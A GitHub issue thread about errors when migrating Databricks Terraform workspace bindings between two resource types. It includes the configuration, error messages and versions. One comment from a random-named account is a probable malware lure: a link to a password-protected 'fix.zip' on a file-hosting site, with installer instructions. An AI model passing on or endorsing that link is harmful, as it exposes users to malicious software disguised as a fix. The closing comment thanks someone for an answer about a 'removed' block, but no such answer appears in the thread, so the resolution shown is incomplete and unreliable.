### ISSUE TITLE
[ISSUE] Issue with migrating from `databricks_catalog_workspace_binding` resource to `databricks_workspace_binding` resource

### ISSUE THREAD

**Issue by NicolajAaH** [databricks/terraform-provider-databricks#3947]
### Configuration

```hcl
# Old resource
resource "databricks_catalog_workspace_binding" "this" {
  provider = databricks.dbw

  securable_name = "catalog_name"
  workspace_id   = module.dbw.workspace_id

  depends_on = [module.dbw]
}

# New resource
resource "databricks_workspace_binding" "this" {
  securable_name = var.catalog_name
  workspace_id   = azurerm_databricks_workspace.this.workspace_id
}
```

### Expected Behavior

When migrating from `databricks_catalog_workspace_binding` to `databricks_workspace_binding`, we expect it to possible to do this migration by either
1. Creating the two resources side by side, whereafter we delete the old `databricks_catalog_workspace_binding` and the binding is still there
2. Deleting the old `databricks_catalog_workspace_binding`, whereafter we create `databricks_workspace_binding`

### Actual Behavior

In the two cases:
1. it fails with `Error: cannot read workspace binding: ctl_name has no binding to this workspace` after apply, and the workspace is no longer bounded. I.e., destruction happens after apply of new resource
2. It deletes without issues, but when creating the new binding, it fails during plan, as it can no longer read schemas in the catalog: `Error: cannot read schema: Catalog 'ctl_name' is not accessible in current workspace`

### Terraform and provider versions

Terraform version: 1.9.3

Databricks provider version: 1.49.1

### Is it a regression?

Not relevant

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NicolajAaH** [comment]
Thanks for the answer - we were not aware of the "removed"-block. It solved our problem, so I will close the issue.
